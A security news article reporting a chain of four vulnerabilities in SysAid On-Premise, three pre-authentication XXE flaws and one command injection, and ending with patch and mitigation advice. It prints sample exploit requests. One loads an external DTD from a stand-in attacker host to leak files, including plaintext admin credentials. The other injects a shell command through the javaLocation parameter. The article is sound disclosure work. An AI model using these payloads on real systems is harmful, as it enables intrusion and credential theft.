By rssfeeds-admin The flaws- CVE-2025-2775, CVE-2025-2776, CVE-2025-2777 (all XML External Entity, or XXE, injections), and CVE-2025-2778 (OS Command Injection)-were disclosed by researchers from watchTowr Labs and others, and present a severe risk to organizations running unpatched versions of SysAid.
Technical Details
Product Scope:
- Affected: SysAid On-Premise (self-hosted) versions ≤ 23.3.40
- Not affected: SysAid SaaS (cloud-hosted)
Vulnerability Chain:
The attack chain leverages three pre-authenticated XXE vulnerabilities and one post-authentication OS command injection.
Here’s how the attack unfolds:
1. Pre-Auth XXE Vulnerabilities
- CVE-2025-2775: XXE in
/mdm/checkinendpoint.
TheGetMdmMessage#doPostThe handler parses user-supplied XML without sanitization, allowing attackers to inject external entities via crafted POST requests. - CVE-2025-2776: XXE in
/mdm/serverurlendpoint.
Similar to the above, but triggered on a different code path within the same handler. - CVE-2025-2777: XXE in
/lshwendpoint.
TheLshwAgent#doPostThe method processes XML input with a SAX parser, again with no input validation, enabling XXE attacks.
Sample Exploit Payload:
textPOST /mdm/checkin HTTP/1.1
Host: target
Content-Type: application/xml
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://attacker/external.dtd">
%foo;
]>
This causes the server to fetch and process attacker-controlled DTDs, enabling file disclosure or internal network probing.
2. Credential Disclosure
A key impact of these XXEs is the ability to extract the contents of InitAccount.cmd, a file created during installation that contains the plaintext admin username and password.
This file’s first line holds the credentials, which can be exfiltrated using XXE, granting attackers full admin access.
3. Post-Auth OS Command Injection (CVE-2025-2778)
Once admin credentials are obtained, attackers can exploit a command injection flaw in the API settings update functionality.
By injecting newlines and shell commands into the javaLocation parameter, arbitrary commands are written to a batch file (updateApi.bat), which is later executed by the system.
Exploit Example:
textPOST /API.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
updateApi=false&updateApiSettings=true&javaLocation="%0acalc%0a
This would inject and execute the calc command on the server.
4. Full RCE Chain
By chaining these vulnerabilities, an unauthenticated attacker can escalate from external file disclosure to full remote code execution as SYSTEM, the highest privilege on Windows.
Risk Factor Table
| Vulnerability | CVE ID | Attack Vector | Privileges Required | Impact | Exploitability | Risk Level |
|---|---|---|---|---|---|---|
| XXE in /mdm/checkin | CVE-2025-2775 | Remote (pre-auth) | None | File disclosure, SSRF | Trivial | Critical |
| XXE in /mdm/serverurl | CVE-2025-2776 | Remote (pre-auth) | None | File disclosure, SSRF | Trivial | Critical |
| XXE in /lshw | CVE-2025-2777 | Remote (pre-auth) | None | File disclosure, SSRF | Trivial | Critical |
| OS Command Injection | CVE-2025-2778 | Authenticated (admin) | Admin | Arbitrary command execution | Trivial | Critical |
Recommendations
- Immediate Patch: Upgrade SysAid On-Premise to version 24.4.60 b16 or later, which addresses all four vulnerabilities.
- Credential Audit: Change all admin passwords and review for unauthorized access.
- Compromise Assessment: Check for indicators of compromise, including suspicious POST requests and unexpected files in the webroot.
- Restrict Access: Limit external exposure of SysAid servers and enforce network segmentation.
These vulnerabilities underscore the high risk posed by business-critical ITSM platforms like SysAid, especially when exposed to the internet.
The pre-auth nature, trivial exploitability, and potential for complete system compromise make immediate remediation essential for all on-premise SysAid deployments.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
The post SysAid ITSM Platform Vulnerability Enables Pre-Authenticated Remote Code Execution appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.